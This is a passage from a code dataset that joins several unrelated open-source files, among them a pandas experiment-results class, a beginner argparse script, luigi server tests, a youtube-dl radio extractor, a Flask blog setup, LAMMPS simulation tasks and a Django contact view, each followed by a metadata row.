        m = pandas.DataFrame(collected_measurements, columns=runtime_metrics)
        #calculate statistics, rename columns to include name of statistic, e.g. Training time -> (Training time, Mean)
        means = pandas.DataFrame(m.mean()).transpose()
        means.columns = [(metric, "Mean") for metric in runtime_metrics]
        std = pandas.DataFrame(m.std()).transpose()
        std.columns = [(metric, "Standard deviation") for metric in runtime_metrics]
        conf = pandas.DataFrame(confidence_interval(m)).transpose()
        conf.columns = [(metric, "Confidence interval") for metric in runtime_metrics]
        #put all individual statistics together and set name of classifier as index
        combined = pandas.concat([means, std, conf], axis=1)
        combined.index = [cls_name]
        return combined


class Results():
    """
    Class that contains the results of a cross-validation experiment. Allows to print and to plot results.
    """

    def __init__(self, classifiers, quality_stats, runtime_stats):
        """
        @param classifiers: The classifiers that were used in the experiment.
        @param quality_stats: A pandas dataframe with 12 columns for each classifier (one column for each possible
        combination of collected quality metrics and calculated statistics). The index of the dataframe is the cutoff,
        i.e. how many recommendations were shown to the user.
        @param runtime_stats: A pandas dataframe with 9 columns for each classifier (one column for each possible
        combination of collected runtime metrics and calculated statistics). The index of the dataframe are the names of
        the tested classifiers.
        @return:
        """
        self.classifiers = classifiers
        self.quality_stats = quality_stats
        self.runtime_stats = runtime_stats

    def compare_quality(self, metric, statistic, cutoff_results_at=None):
        """
        Grab results for given metric and statistic for all tested classifiers.

        @param metric: Name of one of the quality metrics.
        @param statistic: Which statistic to compare (Mean, Standard deviation, Confidence interval)
        @param cutoff_results_at: At any given time only a limited number of services can be available
        and can be recommended, e.g. for 10 binary sensors, 10 services are typically available. The only anomaly is
        right at the beginning of the dataset, where the current status of a sensor is not known, in this case more than
        10 services can be recommended. However, there will be very few instances where this is the case and
        recommendation results will therefore be statistically insignificant. If this parameter is set to any other
        value than None, the output will be restricted to show only results where the cutoff for the number of
        recommendations to be shown lies between 1 and this parameter.
        @return: A pandas dataframe with one column for every classifier, listing the calculated statistics for the
        given metric and all cutoffs.
        """
        assert(statistic in calculated_stats)
        assert(metric in quality_metrics)
        relevant_columns = [(cls.name, metric, statistic) for cls in self.classifiers]
        new_column_names = [cls.name for cls in self.classifiers]
        comparison = self.quality_stats[relevant_columns]
        comparison = comparison.rename(columns={old: new for old, new in zip(relevant_columns, new_column_names)})
        if not cutoff_results_at is None:
            comparison = comparison.loc[1: cutoff_results_at]
        return comparison

    def print_quality_comparison(self, metrics=quality_metrics, cutoff_results_at=None):
        """
        For each of the quality metrics, print a table of confidence intervals. One column for each tested classifier
        and one row for each tested recommendation cutoff.

        @param cutoff_results_at: see `self.compare_quality`
        @param metrics: print comparison only for these metrics
        @return:
        """
        for metric in metrics:
            print "Results for %s" % metric
            print self.compare_quality(metric, "Confidence interval", cutoff_results_at)

    def print_quality_comparison_at_cutoff(self, cutoff, metrics=quality_metrics):
        """
        Print one shared table of confidence intervals for all of the quality metrics. One row for each tested classifier,
        one column for each calculated quality metric. Cutoff the recommendation results at `cutoff`, i.e. the user is
        at most shown `cutoff` recommendations.

        @param cutoff: The cutoff for which to print the results.
        @param metrics: print comparison only for these metrics
        @return:
        """
        comparison = {metric: self.compare_quality(metric, "Confidence interval").loc[cutoff]
                      for metric in metrics}
        comparison = pandas.DataFrame(comparison)[metrics]
        print comparison

    def print_runtime_comparison(self, metrics=runtime_metrics):
        """
        Print one shared table of confidence intervals for all runtime metrics. One row for each tested classifier,
        one column for each calculated runtime metric.

        @param metrics: print comparison only for these metrics
        @return:
        """
        relevant_columns = [(metric, "Confidence interval") for metric in metrics]
        new_column_names = [metric for metric in metrics]
        comparison = self.runtime_stats[relevant_columns]
        comparison = comparison.rename(columns={old: new for old, new in zip(relevant_columns, new_column_names)})
        print comparison

    def plot_quality_comparison(self, plot_config, cutoff_results_at=None, metrics=quality_metrics):
        """
        For each of the quality metrics, generate an XY-line-plot with one line for each classifier. The X-axis is the
        number of recommendations that are shown to the user, the Y-axis is the metric of interest. Uses the means of
        the measurements.

        @param plot_config: A function that can be called to get the full path for a plot file.
        @param cutoff_results_at: see `self.compare_quality`
        @param metrics: plot comparison only for these metrics
        @return:
        """
        for metric in metrics:
            results = self.compare_quality(metric, "Mean", cutoff_results_at)
            plot.plot_quality_comparison(results, metric, plot_config)
| mit | 2,074,946,014,355,926,500 | 48.826446 | 122 | 0.681705 | false | 4.499254 | true | false | false |
marcelopalin/minicurso | scripts/p01/hello_03.py | 1 | 4588 | # -*- coding: utf-8 -*-
#-------------------------------------------------------------------------------
#
# Description: Hello World!
#              - vs 3 - Making the script easier to run by passing parameters
#                at execution time
#
# Author:      @Palin
#
# Last Update: 10/2016
# Created:     10/2016
# Copyright:   (c) Ampere Desenvolvimento 2016
#-------------------------------------------------------------------------------
# Always import these packages
import sys
import os
import math

# Trying to import a package that MAY not be installed!
# Standard recipe: always use Try/Except here.
# This saves the programmer's life!
try:
    # ONLY CHANGE HERE! - Put as many packages as you want to import
    import argparse
    import matplotlib
except ImportError as e:
    exc_type, exc_value, exc_traceback = sys.exc_info()
    traceback_details = {
        'filename': exc_traceback.tb_frame.f_code.co_filename,
        'lineno': exc_traceback.tb_lineno,
        'name': exc_traceback.tb_frame.f_code.co_name,
        'type': exc_type.__name__
    }
    print("#" * 80)
    print("# Error description: " + str(e))
    print(traceback_details)
    print("#" * 80)
    sys.exit()


# ----------------------
# Always document the code
# The comments are later used to generate HTML documentation.
# In general the code documentation is generated with the Sphinx package
#
# Goal: grab the name passed on the command prompt
#
# ----------------------
def main():
    # receiving the parameters
    # If nothing was changed - the default parameters came through!
    lstArgs = parametros_prompt()
    str_nome = lstArgs.str_recebe_nome
    print_debug = lstArgs.flag_imprimir
    dbl_raio = lstArgs.dbl_raio

    print("Hello " + str_nome + ", welcome!")
    print("Given the radius " + str(dbl_raio) + " the circumference length = " + str(2 * math.pi * dbl_raio))
    print("Given the radius " + str(dbl_raio) + " the circle area = " + str(math.pi * dbl_raio**2))

    if print_debug:
        print("Debug printing was enabled!")


##------------------------------------------------------------------------------
## @@ Reads the prompt parameters
##------------------------------------------------------------------------------
def parametros_prompt():
    # --------------------------------------------------------------------------
    # Uses the argparse package
    # Receives the INPUT PARAMETERS passed by the user when EXECUTING the script
    # --------------------------------------------------------------------------
    """ Goal:
        - Capture the prompt parameters and return them in a list.

    :Date: 10/2016
    :Version: 1.0
    :Authors: @Palin
    :copyright: @Marcelo Palin
    """
    # For a string spanning several lines, wrap it in ''' '''.
    parser = argparse.ArgumentParser(
        prog='hello_03.py',
        description='''Minicurso Aprendendo Python - XXVIII SEMAT - Version 1.0
            This program receives 3 input parameters at execution time.
            They are: the person's name, the radius of a circle and the
            show-details (debug) flag.
            \n execution example:
            $ python hello_03.py -debug 1 -raio 2 -nome "Marcelo Palin"
        ''',
        epilog='To consult the Help type: python hello_03.py -h '
    )
    parser.add_argument('-v', '--version', action='version', version='%(prog)s vs. 1.0')
    parser.add_argument('-raio', action='store', dest='dbl_raio', type=float, default=1.0)
    parser.add_argument('-debug', action='store', dest='flag_imprimir', type=int, default=0)  # 0 = false, 1 = true
    parser.add_argument('-nome', action='store', dest='str_recebe_nome', default="Palin")

    # Grabs the parameter list passed on the command prompt and stores it in a list
    # Execution example: python hello_03 -debug 0 -nome "Marcelo Palin"
    lstArgs = parser.parse_args()
    return lstArgs
##@end of method
##----------------------------------------------------------------------------


# When the code runs, which function should be called first?
if __name__ == '__main__':
    main()
| mit | -4,412,214,303,823,284,000 | 34.512 | 113 | 0.546231 | false | 3.250712 | false | false | false |
liqd/adhocracy3.mercator | src/adhocracy_core/adhocracy_core/sheets/comment.py | 2 | 2330 | """Comment sheet."""
from colander import deferred
from substanced.util import find_service

from adhocracy_core.interfaces import ISheet
from adhocracy_core.interfaces import ISheetReferenceAutoUpdateMarker
from adhocracy_core.interfaces import SheetToSheet
from adhocracy_core.sheets import add_sheet_to_registry
from adhocracy_core.schema import MappingSchema
from adhocracy_core.schema import Integer
from adhocracy_core.schema import PostPool
from adhocracy_core.schema import Reference
from adhocracy_core.schema import Text
from adhocracy_core.sheets import sheet_meta


class IComment(ISheet, ISheetReferenceAutoUpdateMarker):
    """Marker interface for the comment sheet."""


class ICommentable(ISheet, ISheetReferenceAutoUpdateMarker):
    """Marker interface for resources that can be commented upon."""


class CommentRefersToReference(SheetToSheet):
    """Reference from comment version to the commented-on item version."""

    source_isheet = IComment
    source_isheet_field = 'refers_to'
    target_isheet = ICommentable


class CommentSchema(MappingSchema):
    """Comment sheet data structure.

    `content`: Text
    """

    refers_to = Reference(reftype=CommentRefersToReference)
    content = Text()
    # TODO add post_pool validator


comment_meta = sheet_meta._replace(isheet=IComment,
                                   schema_class=CommentSchema)


@deferred
def deferred_default_comment_count(node: MappingSchema, kw: dict) -> str:
    """Return comment_count of the current `context` resource."""
    context = kw['context']
    catalogs = find_service(context, 'catalogs')
    return catalogs.get_index_value(context, 'comments')


class CommentableSchema(MappingSchema):
    """Commentable sheet data structure.

    `post_pool`: Pool to post new :class:`adhocracy_sample.resource.IComment`.
    """

    comments_count = Integer(readonly=True,
                             default=deferred_default_comment_count)
    post_pool = PostPool(iresource_or_service_name='comments')


commentable_meta = sheet_meta._replace(
    isheet=ICommentable,
    schema_class=CommentableSchema,
    editable=False,
    creatable=False,
)


def includeme(config):
    """Register sheets."""
    add_sheet_to_registry(comment_meta, config.registry)
| agpl-3.0 | -6,638,699,725,018,826,000 | 28.871795 | 78 | 0.73691 | false | 3.819672 | false | false | false |
renegelinas/mi-instrument | mi/dataset/driver/ctdav_n/auv/test/test_ctdav_n_auv_deprecated_drivers.py | 3 | 1370 | #!/usr/bin/env python
import os
import unittest

from mi.logging import log
from mi.dataset.driver.ctdav_n.auv.ctdav_n_auv_telemetered_driver import parse as parse_telemetered
from mi.dataset.driver.ctdav_n.auv.ctdav_n_auv_recovered_driver import parse as parse_recovered
from mi.dataset.driver.ctdav_n.auv.resource import RESOURCE_PATH
from mi.dataset.dataset_driver import ParticleDataHandler

__author__ = 'Rene Gelinas'


class DriverTest(unittest.TestCase):

    source_file_path = os.path.join(RESOURCE_PATH, 'subset_reduced.csv')

    def test_telemetered_deprecation(self):
        particle_data_handler = parse_telemetered(None, self.source_file_path, ParticleDataHandler())

        log.info("SAMPLES: %s", particle_data_handler._samples)
        log.info("FAILURE: %s", particle_data_handler._failure)

        self.assertEquals(particle_data_handler._failure, False)

    def test_recovered_deprecation(self):
        particle_data_handler = parse_recovered(None, self.source_file_path, ParticleDataHandler())

        log.info("SAMPLES: %s", particle_data_handler._samples)
        log.info("FAILURE: %s", particle_data_handler._failure)

        self.assertEquals(particle_data_handler._failure, False)


if __name__ == '__main__':
    test = DriverTest('deprecation_tests')
    test.test_telemetered_deprecation()
    test.test_recovered_deprecation()
| bsd-2-clause | 7,216,453,601,948,751,000 | 32.414634 | 101 | 0.727007 | false | 3.416459 | true | false | false |
gkoelln/youtube-dl | youtube_dl/extractor/cjsw.py | 45 | 2412 | # coding: utf-8
from __future__ import unicode_literals

import re

from .common import InfoExtractor
from ..utils import (
    determine_ext,
    unescapeHTML,
)


class CJSWIE(InfoExtractor):
    _VALID_URL = r'https?://(?:www\.)?cjsw\.com/program/(?P<program>[^/]+)/episode/(?P<id>\d+)'
    _TESTS = [{
        'url': 'http://cjsw.com/program/freshly-squeezed/episode/20170620',
        'md5': 'cee14d40f1e9433632c56e3d14977120',
        'info_dict': {
            'id': '91d9f016-a2e7-46c5-8dcb-7cbcd7437c41',
            'ext': 'mp3',
            'title': 'Freshly Squeezed – Episode June 20, 2017',
            'description': 'md5:c967d63366c3898a80d0c7b0ff337202',
            'series': 'Freshly Squeezed',
            'episode_id': '20170620',
        },
    }, {
        # no description
        'url': 'http://cjsw.com/program/road-pops/episode/20170707/',
        'only_matching': True,
    }]

    def _real_extract(self, url):
        mobj = re.match(self._VALID_URL, url)
        program, episode_id = mobj.group('program', 'id')
        audio_id = '%s/%s' % (program, episode_id)

        webpage = self._download_webpage(url, episode_id)

        title = unescapeHTML(self._search_regex(
            (r'<h1[^>]+class=["\']episode-header__title["\'][^>]*>(?P<title>[^<]+)',
             r'data-audio-title=(["\'])(?P<title>(?:(?!\1).)+)\1'),
            webpage, 'title', group='title'))

        audio_url = self._search_regex(
            r'<button[^>]+data-audio-src=(["\'])(?P<url>(?:(?!\1).)+)\1',
            webpage, 'audio url', group='url')

        audio_id = self._search_regex(
            r'/([\da-f]{8}-[\da-f]{4}-[\da-f]{4}-[\da-f]{4}-[\da-f]{12})\.mp3',
            audio_url, 'audio id', default=audio_id)

        formats = [{
            'url': audio_url,
            'ext': determine_ext(audio_url, 'mp3'),
            'vcodec': 'none',
        }]

        description = self._html_search_regex(
            r'<p>(?P<description>.+?)</p>', webpage, 'description',
            default=None)
        series = self._search_regex(
            r'data-showname=(["\'])(?P<name>(?:(?!\1).)+)\1', webpage,
            'series', default=program, group='name')

        return {
            'id': audio_id,
            'title': title,
            'description': description,
            'formats': formats,
            'series': series,
            'episode_id': episode_id,
        }
| unlicense | -4,063,502,987,773,949,400 | 32.472222 | 95 | 0.506224 | false | 3.247978 | false | false | false |
embik/bloks | bloks/__init__.py | 1 | 1395 | import os
import logging
from logging import Formatter
from logging.handlers import RotatingFileHandler

from flask import Flask
from flask.ext.sqlalchemy import SQLAlchemy
from flask.ext.login import LoginManager
from flask.ext.pagedown import PageDown

app = Flask(__name__)
app.config.from_object('bloks.config')

# Check for various necessary configuration keys
assert 'BLOG_TITLE' in app.config, 'No BLOG_TITLE config value found'
assert 'BLOG_DESCRIPTION' in app.config, 'No BLOG_DESCRIPTION config value found'
assert 'SECRET_KEY' in app.config, 'No SECRET_KEY config value found'
assert 'LOG_PATH' in app.config, 'No LOG_PATH config value found'

# Initialize logging handler
handler = RotatingFileHandler(app.config['LOG_PATH'], maxBytes=1000, backupCount=1)
handler.setFormatter(Formatter('%(asctime)s %(levelname)s: %(message)s'))
handler.setLevel(logging.INFO)
app.logger.addHandler(handler)

# Initialize PageDown
pagedown = PageDown(app)

# Initialize SQLAlchemy database
db = SQLAlchemy(app)

# Initialize LoginManager
lm = LoginManager()
lm.init_app(app)

from . import utils
from .models import Link

app.jinja_env.globals.update(render_markdown=utils.render_markdown)
app.jinja_env.globals.update(join=os.path.join)
app.jinja_env.globals.update(link_query=Link.query.all)

from . import views, admin_views, errors, models

__all__ = ['views', 'admin_views', 'errors', 'models', ]
| mit | 4,729,526,484,337,995,000 | 32.214286 | 83 | 0.779211 | false | 3.4875 | true | false | false |
hovo1990/deviser | generator/bindings_files/BindingsFiles.py | 1 | 8465 | #!/usr/bin/env python
#
# @file    BindingsFiles.py
# @brief   class for generating the language bindings files
# @author Frank Bergmann
# @author Sarah Keating
#
# <!--------------------------------------------------------------------------
#
# Copyright (c) 2013-2015 by the California Institute of Technology
# (California, USA), the European Bioinformatics Institute (EMBL-EBI, UK)
# and the University of Heidelberg (Germany), with support from the National
# Institutes of Health (USA) under grant R01GM070923. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
# Neither the name of the California Institute of Technology (Caltech), nor
# of the European Bioinformatics Institute (EMBL-EBI), nor of the University
# of Heidelberg, nor the names of any contributors, may be used to endorse
# or promote products derived from this software without specific prior
# written permission.
# ------------------------------------------------------------------------ -->
from util import global_variables
from . import DowncastExtensionFile
from . import DowncastNamespaceFile
from . import DowncastPackagesFile
from . import DowncastPluginsFile
from . import NativeSwigFile
from . import BaseBindingsFiles


class BindingFiles():
    """Class for all Bindings files"""

    def __init__(self, pkg_object, binding, verbose=False):
        # members from object
        self.package = pkg_object['name']
        self.verbose = verbose
        self.binding = binding
        self.language = global_variables.language

        self.elements = pkg_object['baseElements']
        self.plugins = pkg_object['plugins']

    #########################################################################
    # package files

    def write_downcast_extension(self):
        if not global_variables.is_package:
            return
        name = 'local-downcast-extension-{0}'.format(self.package)
        ext = DowncastExtensionFile.DowncastExtensionFile(name,
                                                          self.package,
                                                          self.binding)
        if self.verbose:
            print('Writing file {0}'.format(ext.fileout.filename))
        ext.write_file()
        ext.close_file()

    def write_downcast_namespace(self):
        if not global_variables.is_package:
            return
        name = 'local-downcast-namespaces-{0}'.format(self.package)
        ext = DowncastNamespaceFile.DowncastNamespaceFile(name,
                                                          self.package,
                                                          self.binding)
        if self.verbose:
            print('Writing file {0}'.format(ext.fileout.filename))
        ext.write_file()
        ext.close_file()

    def write_downcast_packages(self):
        if not global_variables.is_package:
            return
        if self.binding == 'csharp' or self.binding == 'java':
            name = 'local-packages-{0}'.format(self.package)
        else:
            name = 'local-downcast-packages-{0}'.format(self.package)
        ext = DowncastPackagesFile.DowncastPackagesFile(name,
                                                        self.package,
                                                        self.binding,
                                                        self.elements,
                                                        self.plugins)
        if self.verbose and ext.fileout:
            print('Writing file {0}'.format(ext.fileout.filename))
        ext.write_file()
        ext.close_file()

    def write_downcast_plugins(self):
        if not global_variables.is_package:
            return
        name = 'local-downcast-plugins-{0}'.format(self.package)
        ext = DowncastPluginsFile.DowncastPluginsFile(name,
                                                      self.package,
                                                      self.binding,
                                                      self.plugins)
        if self.verbose and ext.fileout:
            print('Writing file {0}'.format(ext.fileout.filename))
        ext.write_file()
        ext.close_file()

    #########################################################################
    # local files

    def write_local(self):
        if global_variables.is_package:
            self.write_local_package_files()
        else:
            self.write_local_library_files()

    def write_local_package_files(self):
        if self.binding == 'csharp' or self.binding == 'java':
            return
        else:
            name = 'local-{0}'.format(self.package)
        ext = DowncastPackagesFile.DowncastPackagesFile(name,
                                                        self.package,
                                                        self.binding,
                                                        self.elements,
                                                        self.plugins,
                                                        True)
        if self.verbose and ext.fileout:
            print('Writing file {0}'.format(ext.fileout.filename))
        ext.write_file()
        ext.close_file()

    def write_local_library_files(self):
        base_files = BaseBindingsFiles.BaseBindingsFiles(self.elements,
                                                         self.binding, True)
        base_files.write_files()

    ########################################################################
    # write files in the swig directory

    def write_swig_files(self):
        if global_variables.is_package:
            self.write_swig_package_files()
        else:
            self.write_swig_library_files()

    def write_swig_package_files(self):
        name = '{0}-package'.format(self.package)
        ext = NativeSwigFile.NativeSwigFile(name, self.package, self.elements,
                                            self.plugins, is_header=True)
        if self.verbose and ext.fileout:
            print('Writing file {0}'.format(ext.fileout.filename))
        ext.write_file()
        ext.close_file()

        name = '{0}-package'.format(self.package)
        ext = NativeSwigFile.NativeSwigFile(name, self.package, self.elements,
                                            self.plugins, is_header=False)
        if self.verbose and ext.fileout:
            print('Writing file {0}'.format(ext.fileout.filename))
        ext.write_file()
        ext.close_file()

    def write_swig_library_files(self):
        base_files = BaseBindingsFiles.BaseBindingsFiles(self.elements,
                                                         'swig', True)
        base_files.write_files()

    ########################################################################
    # other library files

    def write_cmake_file(self):
        if global_variables.is_package:
            return
        base_files = BaseBindingsFiles.BaseBindingsFiles(self.elements,
                                                         self.binding, True)
        base_files.write_files()

    ########################################################################

    def write_files(self):
        if self.binding != 'swig':
            self.write_downcast_extension()
            self.write_downcast_namespace()
            self.write_downcast_packages()
            self.write_downcast_plugins()
            self.write_local()
        else:
            self.write_swig_files()
| lgpl-2.1 | 1,252,636,336,700,358,700 | 41.752525 | 78 | 0.537389 | false | 4.769014 | false | false | false |
uschille/FabSim | deploy/fabNanoMD.py | 1 | 5847 | # -*- coding: utf-8 -*-
#
# Copyright (C) University College London, 2013, all rights reserved.
#
# This file is part of FabMD and is CONFIDENTIAL. You may not work
# with, install, use, duplicate, modify, redistribute or share this
# file, or any part thereof, other than as allowed by any agreement
# specifically made by you with University College London.
#

from fab import *


@task
def lammps(config, **args):
    """Submit a LAMMPS job to the remote queue.

    The job results will be stored with a name pattern as defined in the environment,
    e.g. cylinder-abcd1234-legion-256

    config : config directory to use to define geometry, e.g. config=cylinder

    Keyword arguments:
        cores : number of compute cores to request
        images : number of images to take
        steering : steering session i.d.
        wall_time : wall-time job limit
        memory : memory per node
    """
    with_config(config)
    execute(put_configs, config)
    job(dict(script='lammps',
             cores=4, wall_time='0:15:0', memory='2G'), args)
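
# Example invocation from a shell (the host alias and option values below are
# illustrative only, not prescribed by this file):
#   fab legion lammps:config=cylinder,cores=32,wall_time='1:0:0'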

#@task
#def lammps_swelling_test(config, **args):
"""Submits a set of LAMMPS jobs to the remote queue, as part of a clay swelling test."""
#    let's first try to run the exfoliated one.
#    lammps_in_file =
#    with_config(config)
#    execute(put_configs,config)
#    loop over swelling values
#    update_environment(dict(job_results, job_config_path))
#    job(dict(script='lammps',
#             cores=4, wall_time='0:15:0',memory='2G'),args)


### IBI ###

@task
def do_ibi(number, outdir, pressure=1, config_name="peg", copy="yes", ibi_script="ibi.sh", atom_dir=os.path.join(env.localroot, 'python')):
    """ Copy the obtained output to a work directory, do an IBI iteration and make a new config file from the resulting data. """
    ibi_in_dir = os.path.join(env.localroot, 'results', outdir)
    ibi_out_dir = os.path.join(env.localroot, 'output_blackbox', os.path.basename(ibi_script), outdir)
    local("mkdir -p %s" % (ibi_out_dir))
#    if copy=="yes":
#        blackbox("copy_lammps_results.sh", "%s %s %d" % (os.path.join(env.localroot,'results',outdir), os.path.join(env.localroot,'python'), int(number)))
    blackbox(ibi_script, "%s %s %s %s %s" % (atom_dir, number, pressure, ibi_in_dir, ibi_out_dir))
    if copy == "yes":
        blackbox("prepare_lammps_config.sh", "%s %s %s %d %s" % (ibi_out_dir, os.path.join(env.localroot, 'config_files'), config_name, int(number)+1, atom_dir))


@task
def ibi_analysis_multi(start_iter, num_iters, outdir_prefix, outdir_suffix, ibi_script="ibi.sh", pressure=1, atom_dir=os.path.join(env.localroot, 'python')):
    """ Recreate IBI analysis results based on the output files provided.
    Example use: fab hector ibi_analysis_multi:start_iter=7,num_iters=3,outdir_prefix=peg_,outdir_suffix=_hector_32 """
    si = int(start_iter)
    ni = int(num_iters)
    for i in xrange(si, si+ni):
        outdir = "%s%d%s" % (outdir_prefix, i, outdir_suffix)
        do_ibi(i, outdir, pressure, outdir_prefix, "no", ibi_script, atom_dir)
#        ibi_in_dir = os.path.join(env.localroot,'results',outdir)
#        ibi_out_dir = os.path.join(env.localroot,'ibi_output',outdir)
#        local("mkdir -p %s" % (ibi_out_dir))
#        blackbox("copy_lammps_results.sh", "%s %s %d" % (os.path.join(env.localroot,'results',"%s%d%s" % (outdir_prefix,i,outdir_suffix)), os.path.join(env.localroot,'python'), i))
#        blackbox(ibi_script, "%s %s %s %s" % (i, pressure, ibi_in_dir, ibi_out_dir))


@task
def full_ibi(config, number, outdir, config_name, pressure=0.3, ibi_script="ibi.sh", atom_dir=os.path.join(env.localroot, 'python'), **args):
    """ Performs both do_ibi and runs lammps with the newly created config file.
    Example use: fab hector full_ibi:config=2peg4,number=3,outdir=2peg3_hector_32,config_name=2peg,cores=32,wall_time=3:0:0 """
    do_ibi(number, outdir, pressure, config_name, "yes", ibi_script, atom_dir)
    lammps(config, **args)
    wait_complete()
    fetch_results(regex="*%s*" % (config_name))


@task
def full_ibi_multi(start_iter, num_iters, config_name, outdir_suffix, pressure=0.3, script="ibi.sh", atom_dir=os.path.join(env.localroot, 'python'), **args):
    """ Do multiple IBI iterations in one command.
    Example use: fab hector full_ibi_multi:start_iter=7,num_iters=3,config_name=2peg,outdir_suffix=_hector_32,cores=32,wall_time=3:0:0 """
    si = int(start_iter)
    ni = int(num_iters)
    pressure_changed = 0
    for i in xrange(si, si+ni):
        full_ibi("%s%d" % (config_name, i+1), i, "%s%d%s" % (config_name, i, outdir_suffix), config_name, pressure, script, atom_dir, **args)
        p_ave, p_std = lammps_get_pressure(os.path.join(env.localroot, "results", "%s%d%s" % (config_name, i, outdir_suffix)), i)
        print "Average pressure is now", p_ave, "after iteration", i, "completed."
#        if(i >= 10 and p_ave < p_std):
#            if pressure_changed == 0:
#                pressure = float(pressure)/3.0
#                pressure_changed = 1
#            print "(FabMD:) Pressure factor now set to", pressure, "after iteration", i
#        if abs(p_ave) - (p_std*0.5) < 0:  # We have converged, let's not waste further CPU cycles!
#            print "(FabMD:) Pressure has converged. OPTIMIZATION COMPLETE"
#            break


### Utility Functions

def lammps_get_pressure(log_dir, number):
    steps = []
    pressures = []
    LIST_IN = open(os.path.join(log_dir, "new_CG.prod%d.log" % (number)), 'r')
    for line in LIST_IN:
        NewRow = (line.strip()).split()
        if len(NewRow) > 0:
            if NewRow[0] == "Press":
                pressures.append(float(NewRow[2]))
    d1 = np.array(pressures[5:])
    print "READ: new_CG.prod%d.log" % (number)
    return np.average(d1), np.std(d1)  # average and stdev
| lgpl-3.0 | -5,547,807,885,847,404,000 | 45.404762 | 181 | 0.638276 | false | 2.992323 | true | false | false |
vine/luigi | test/server_test.py | 13 | 3810 | # -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

import os
import multiprocessing
import random
import signal
import time
import tempfile

from helpers import unittest, with_config

import luigi.rpc
import luigi.server
from luigi.scheduler import CentralPlannerScheduler
from tornado.testing import AsyncHTTPTestCase


class ServerTestBase(AsyncHTTPTestCase):

    def get_app(self):
        return luigi.server.app(CentralPlannerScheduler())

    def setUp(self):
        super(ServerTestBase, self).setUp()

        self._old_fetch = luigi.rpc.RemoteScheduler._fetch

        def _fetch(obj, url, body, *args, **kwargs):
            response = self.fetch(url, body=body, method='POST')
            if response.code >= 400:
                raise luigi.rpc.RPCError(
                    'Error when connecting to remote scheduler'
                )
            return response.body.decode('utf-8')

        luigi.rpc.RemoteScheduler._fetch = _fetch

    def tearDown(self):
        super(ServerTestBase, self).tearDown()
        luigi.rpc.RemoteScheduler._fetch = self._old_fetch


class ServerTest(ServerTestBase):

    def test_visualizer(self):
        page = self.fetch('/').body
        self.assertTrue(page.find(b'<title>') != -1)

    def _test_404(self, path):
        response = self.fetch(path)
        self.assertEqual(response.code, 404)

    def test_404(self):
        self._test_404('/foo')

    def test_api_404(self):
        self._test_404('/api/foo')


class ServerTestRun(unittest.TestCase):
    """Test to start and stop the server in a more "standard" way
    """

    def run_server(self):
        luigi.server.run(api_port=self._api_port, address='127.0.0.1')

    def start_server(self):
        self._api_port = random.randint(1024, 9999)
        self._process = multiprocessing.Process(target=self.run_server)
        self._process.start()
        time.sleep(0.1)  # wait for server to start
        self.sch = luigi.rpc.RemoteScheduler(host='localhost', port=self._api_port)
        self.sch._wait = lambda: None

    def stop_server(self):
        self._process.terminate()
        self._process.join(1)
        if self._process.is_alive():
            os.kill(self._process.pid, signal.SIGKILL)

    def setUp(self):
        state_path = tempfile.mktemp(suffix=self.id())
        luigi.configuration.get_config().set('scheduler', 'state_path', state_path)
        self.start_server()

    def tearDown(self):
        self.stop_server()

    def test_ping(self):
        self.sch.ping(worker='xyz')

    def test_raw_ping(self):
        self.sch._request('/api/ping', {'worker': 'xyz'})

    def test_raw_ping_extended(self):
        self.sch._request('/api/ping', {'worker': 'xyz', 'foo': 'bar'})

    def test_404(self):
        with self.assertRaises(luigi.rpc.RPCError):
            self.sch._request('/api/fdsfds', {'dummy': 1})

    def test_save_state(self):
        self.sch.add_task('X', 'B', deps=('A',))
        self.sch.add_task('X', 'A')
        self.assertEqual(self.sch.get_work('X')['task_id'], 'A')
        self.stop_server()
        self.start_server()
        work = self.sch.get_work('X')['running_tasks'][0]
        self.assertEqual(work['task_id'], 'A')


if __name__ == '__main__':
    unittest.main()
| apache-2.0 | 4,112,797,289,493,169,000 | 28.765625 | 83 | 0.634908 | false | 3.720703 | true | false | false |
westphahl/verleihsystem | doc/code/server_contact_view.py | 1 | 1178 | def contact_form(request):
    if request.method == 'POST':
        form = ContactForm(request.POST)
        if form.is_valid():
            name = form.cleaned_data['name']
            mail = form.cleaned_data['mail']
            subject = "[Verleihsystem:Kontakt]: " + form.cleaned_data['subject']
            message = form.cleaned_data['message']
            cc_myself = form.cleaned_data['cc_myself']
            recipients = [getattr(settings, 'CONTACT_FORM_EMAIL', '')]
            if cc_myself:
                recipients.append(mail)
            email = EmailMessage(subject=subject, body=message,
                                 to=recipients, headers={'Reply-To': mail})
            email.send()
            return redirect(reverse('home'))
    else:
        if request.user.is_anonymous():
            form = ContactForm()
        else:
            name = "%s %s" % (request.user.first_name, request.user.last_name)
            mail = request.user.email
            form = ContactForm(initial={'name': name, 'mail': mail})
    return render_to_response('contact/contact_form.html', {'form': form,},
                              context_instance=RequestContext(request))
| isc | 8,925,344,169,523,678,000 | 41.071429 | 78 | 0.550934 | false | 4.147887 | false | false | false |
seanbell/opensurfaces | server/common/migrations/0003_auto__add_papercitation.py | 1 | 1955 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
